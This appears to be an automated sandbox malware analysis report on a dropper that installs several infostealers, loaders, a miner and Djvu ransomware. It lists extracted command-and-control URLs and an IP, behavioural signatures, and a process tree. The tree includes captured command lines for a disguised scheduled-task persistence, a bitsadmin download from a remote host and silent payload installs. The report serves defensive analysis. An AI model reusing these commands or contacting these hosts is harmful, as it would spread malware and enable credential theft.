Overview

overview

10

Static

static

Fri051e1e7444.exe

windows7_x64

10

Fri051e1e7444.exe

windows7_x64

10

Fri051e1e7444.exe

windows7_x64

10

Fri051e1e7444.exe

windows11_x64

10

Fri051e1e7444.exe

windows10_x64

10

Fri051e1e7444.exe

windows10_x64

10

Fri051e1e7444.exe

windows10_x64

10

Resubmissions

23-10-2021 15:52

211023-tbkbesdcfm 10

22-10-2021 17:40

211022-v8trsscggr 10

22-10-2021 15:55

211022-tc9ygacgan 10

22-10-2021 14:38

211022-rz1bfabgb8 10

Analysis

  • max time kernel
    1287s
  • max time network
    1806s
  • platform
    windows10_x64
  • resource
    win10-de-20210920
  • submitted
    22-10-2021 14:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Fri051e1e7444.exe

  • Size

    403KB

  • MD5

    b4c503088928eef0e973a269f66a0dd2

  • SHA1

    eb7f418b03aa9f21275de0393fcbf0d03b9719d5

  • SHA256

    2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2

  • SHA512

    c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

Score
10/10
djvuicedidraccoonredlinesmokeloadersocelarsvidarxmrigzloader7c9b4504a63ed23664e38808e65948379b790395874dee7d322070fc6dc34b3b6cd43904077db44d916921937james2221875681804backdoorbankerbotnetdiscoveryevasioninfostealerminerpersistenceransomwarespywarestealerthemidatrojan

Malware Config

Extracted

Family

raccoon

rc4.plain

Extracted

Family

raccoon

Version

1.8.1

Botnet

874dee7d322070fc6dc34b3b6cd43904077db44d

Attributes
  • url4cnc

    https://telete.in/isuzoShadowhunter

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

41.5

Botnet

937

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    937

Extracted

Family

smokeloader

Version

2020

C2

http://gejajoo7.top/

http://sysaheu9.top/

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.5

Botnet

916

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    916

Extracted

Family

vidar

Version

41.5

Botnet

921

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    921

Extracted

Family

redline

Botnet

james222

C2

135.181.129.119:4805

Extracted

Family

raccoon

Botnet

7c9b4504a63ed23664e38808e65948379b790395

Attributes
  • url4cnc

    http://telegka.top/capibar

    http://telegin.top/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Extracted

Family

icedid

Campaign

1875681804

Extracted

Family

djvu

C2

http://rlrz.org/lancer

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

    trojanbankericedid
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Modifies system executable filetype association 2 TTPs 3 IoCs
    persistence
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • Registers COM server for autorun 1 TTPs
    persistence
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

    trojanbotnetzloader
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 7 IoCs
    stealer
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 13 IoCs
    persistence
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 13 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 19 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 20 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 51 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • NSIS installer 2 IoCs
    installer
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 16 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 6 IoCs
    evasion
  • Download via BitsAdmin 1 TTPs 2 IoCs
    dropper
  • Kills process with taskkill 14 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    1⤵
    • Suspicious use of SetThreadContext
    PID:3916
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:6976
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2716
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2584
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2564
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2396
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2372
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1920
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1420
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1320
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1204
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1084
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1032
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:7788
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            3⤵
                              PID:4496
                              • C:\Windows\SysWOW64\schtasks.exe
                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                4⤵
                                • Creates scheduled task(s)
                                PID:8588
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  5⤵
                                  • Loads dropped DLL
                                  PID:6684
                          • \??\c:\windows\system\svchost.exe
                            c:\windows\system\svchost.exe
                            2⤵
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            PID:7388
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:8024
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              3⤵
                                PID:8548
                            • C:\Users\Admin\AppData\Roaming\etdigsj
                              C:\Users\Admin\AppData\Roaming\etdigsj
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:7188
                              • C:\Users\Admin\AppData\Roaming\etdigsj
                                C:\Users\Admin\AppData\Roaming\etdigsj
                                3⤵
                                  PID:9092
                              • C:\Users\Admin\AppData\Roaming\ivdigsj
                                C:\Users\Admin\AppData\Roaming\ivdigsj
                                2⤵
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:6496
                              • C:\Users\Admin\AppData\Roaming\sjdigsj
                                C:\Users\Admin\AppData\Roaming\sjdigsj
                                2⤵
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:1940
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:7084
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  3⤵
                                    PID:7676
                                • \??\c:\windows\system\svchost.exe
                                  c:\windows\system\svchost.exe
                                  2⤵
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  PID:8668
                                • C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe
                                  C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe --Task
                                  2⤵
                                  • Suspicious use of SetThreadContext
                                  PID:5168
                                  • C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe
                                    C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe --Task
                                    3⤵
                                      PID:7944
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    2⤵
                                    • Suspicious use of SetThreadContext
                                    PID:8104
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      3⤵
                                        PID:7552
                                    • C:\Users\Admin\AppData\Roaming\etdigsj
                                      C:\Users\Admin\AppData\Roaming\etdigsj
                                      2⤵
                                      • Suspicious use of SetThreadContext
                                      PID:8732
                                      • C:\Users\Admin\AppData\Roaming\etdigsj
                                        C:\Users\Admin\AppData\Roaming\etdigsj
                                        3⤵
                                          PID:7964
                                      • C:\Users\Admin\AppData\Roaming\ivdigsj
                                        C:\Users\Admin\AppData\Roaming\ivdigsj
                                        2⤵
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:8812
                                      • C:\Users\Admin\AppData\Roaming\sjdigsj
                                        C:\Users\Admin\AppData\Roaming\sjdigsj
                                        2⤵
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:6056
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        2⤵
                                          PID:5960
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            3⤵
                                              PID:4352
                                          • C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe
                                            C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe --Task
                                            2⤵
                                              PID:5400
                                              • C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe
                                                C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe --Task
                                                3⤵
                                                  PID:5104
                                              • \??\c:\windows\system\svchost.exe
                                                c:\windows\system\svchost.exe
                                                2⤵
                                                  PID:4420
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  2⤵
                                                    PID:3272
                                                  • C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe
                                                    C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe --Task
                                                    2⤵
                                                      PID:7776
                                                      • C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe
                                                        C:\Users\Admin\AppData\Local\90966634-8bca-46ef-b4d6-8320e3e430ef\2474.exe --Task
                                                        3⤵
                                                          PID:6408
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                      1⤵
                                                        PID:1004
                                                      • C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"
                                                        1⤵
                                                        • Checks computer location settings
                                                        • Modifies system certificate store
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:904
                                                        • C:\Users\Admin\Pictures\Adobe Films\sHIHNlK_uzvZre209gUiMHJ2.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\sHIHNlK_uzvZre209gUiMHJ2.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3988
                                                        • C:\Users\Admin\Pictures\Adobe Films\Wijdpy_9bAaU4jq8oHGStCWU.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\Wijdpy_9bAaU4jq8oHGStCWU.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:3880
                                                        • C:\Users\Admin\Pictures\Adobe Films\G8WvcvoJrj7dI0R6rjDUDyM4.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\G8WvcvoJrj7dI0R6rjDUDyM4.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:3956
                                                          • C:\Users\Admin\Documents\rTbvIS2p3hpvysBvxPx43oAF.exe
                                                            "C:\Users\Admin\Documents\rTbvIS2p3hpvysBvxPx43oAF.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Checks computer location settings
                                                            PID:4468
                                                            • C:\Users\Admin\Pictures\Adobe Films\J_KU_n454P9hoEj_oTwtcnn7.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\J_KU_n454P9hoEj_oTwtcnn7.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:2212
                                                            • C:\Users\Admin\Pictures\Adobe Films\mnp024N2OIQbEdq0qSProC3o.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\mnp024N2OIQbEdq0qSProC3o.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:5640
                                                              • C:\Users\Admin\AppData\Local\Temp\is-CKMQ3.tmp\mnp024N2OIQbEdq0qSProC3o.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-CKMQ3.tmp\mnp024N2OIQbEdq0qSProC3o.tmp" /SL5="$102E4,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mnp024N2OIQbEdq0qSProC3o.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:5212
                                                                • C:\Users\Admin\AppData\Local\Temp\is-4H88J.tmp\DYbALA.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-4H88J.tmp\DYbALA.exe" /S /UID=2709
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:6404
                                                                  • C:\Program Files\7-Zip\WOMWHDSUJK\foldershare.exe
                                                                    "C:\Program Files\7-Zip\WOMWHDSUJK\foldershare.exe" /VERYSILENT
                                                                    7⤵
                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                    PID:4120
                                                                  • C:\Users\Admin\AppData\Local\Temp\6d-4ca2c-cfe-7dca1-d7fcf2266cd19\Saqaehocymae.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\6d-4ca2c-cfe-7dca1-d7fcf2266cd19\Saqaehocymae.exe"
                                                                    7⤵
                                                                    • Checks computer location settings
                                                                    PID:4244
                                                                  • C:\Users\Admin\AppData\Local\Temp\df-2478e-5e6-2408d-48901751eede2\Suhufobaegy.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\df-2478e-5e6-2408d-48901751eede2\Suhufobaegy.exe"
                                                                    7⤵
                                                                      PID:3700
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n01v4ci5.ka5\GcleanerEU.exe /eufive & exit
                                                                        8⤵
                                                                          PID:4832
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            9⤵
                                                                              PID:5428
                                                                            • C:\Users\Admin\AppData\Local\Temp\n01v4ci5.ka5\GcleanerEU.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\n01v4ci5.ka5\GcleanerEU.exe /eufive
                                                                              9⤵
                                                                                PID:7724
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\02l5ak52.45z\installer.exe /qn CAMPAIGN="654" & exit
                                                                              8⤵
                                                                                PID:6668
                                                                                • C:\Users\Admin\AppData\Local\Temp\02l5ak52.45z\installer.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\02l5ak52.45z\installer.exe /qn CAMPAIGN="654"
                                                                                  9⤵
                                                                                  • Enumerates connected drives
                                                                                  • Modifies system certificate store
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:7740
                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\02l5ak52.45z\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\02l5ak52.45z\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654227 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                    10⤵
                                                                                      PID:8120
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bauiqgno.3a0\any.exe & exit
                                                                                  8⤵
                                                                                    PID:3872
                                                                                    • C:\Users\Admin\AppData\Local\Temp\bauiqgno.3a0\any.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\bauiqgno.3a0\any.exe
                                                                                      9⤵
                                                                                        PID:7732
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e5ppzjeq.431\gcleaner.exe /mixfive & exit
                                                                                      8⤵
                                                                                        PID:6384
                                                                                        • C:\Users\Admin\AppData\Local\Temp\e5ppzjeq.431\gcleaner.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\e5ppzjeq.431\gcleaner.exe /mixfive
                                                                                          9⤵
                                                                                            PID:7888
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dwtsumga.mgf\autosubplayer.exe /S & exit
                                                                                          8⤵
                                                                                            PID:5156
                                                                                            • C:\Users\Admin\AppData\Local\Temp\dwtsumga.mgf\autosubplayer.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\dwtsumga.mgf\autosubplayer.exe /S
                                                                                              9⤵
                                                                                              • Drops file in Program Files directory
                                                                                              PID:7880
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoDE3A.tmp\tempfile.ps1"
                                                                                                10⤵
                                                                                                  PID:4832
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoDE3A.tmp\tempfile.ps1"
                                                                                                  10⤵
                                                                                                    PID:8784
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoDE3A.tmp\tempfile.ps1"
                                                                                                    10⤵
                                                                                                      PID:5132
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoDE3A.tmp\tempfile.ps1"
                                                                                                      10⤵
                                                                                                        PID:4052
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoDE3A.tmp\tempfile.ps1"
                                                                                                        10⤵
                                                                                                          PID:8176
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoDE3A.tmp\tempfile.ps1"
                                                                                                          10⤵
                                                                                                            PID:9088
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoDE3A.tmp\tempfile.ps1"
                                                                                                            10⤵
                                                                                                            • Checks for any installed AV software in registry
                                                                                                            PID:6652
                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                            "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                            10⤵
                                                                                                            • Download via BitsAdmin
                                                                                                            PID:8216
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Ss66TRoX1JJ0bvPBRjiM26ft.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Ss66TRoX1JJ0bvPBRjiM26ft.exe"
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5632
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\dBkgbpr3IQUiDTAyYIcSuBe8.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\dBkgbpr3IQUiDTAyYIcSuBe8.exe"
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:5620
                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Adds Run key to start application
                                                                                                  PID:5284
                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                    6⤵
                                                                                                    • Checks computer location settings
                                                                                                    PID:7568
                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffeefc8dec0,0x7ffeefc8ded0,0x7ffeefc8dee0
                                                                                                      7⤵
                                                                                                        PID:7472
                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,2600274454167422055,9367726025164535261,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7568_443133338" --mojo-platform-channel-handle=1692 /prefetch:8
                                                                                                        7⤵
                                                                                                          PID:6092
                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,2600274454167422055,9367726025164535261,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7568_443133338" --mojo-platform-channel-handle=2100 /prefetch:8
                                                                                                          7⤵
                                                                                                            PID:7524
                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1628,2600274454167422055,9367726025164535261,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7568_443133338" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:2
                                                                                                            7⤵
                                                                                                              PID:4308
                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,2600274454167422055,9367726025164535261,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7568_443133338" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2516 /prefetch:1
                                                                                                              7⤵
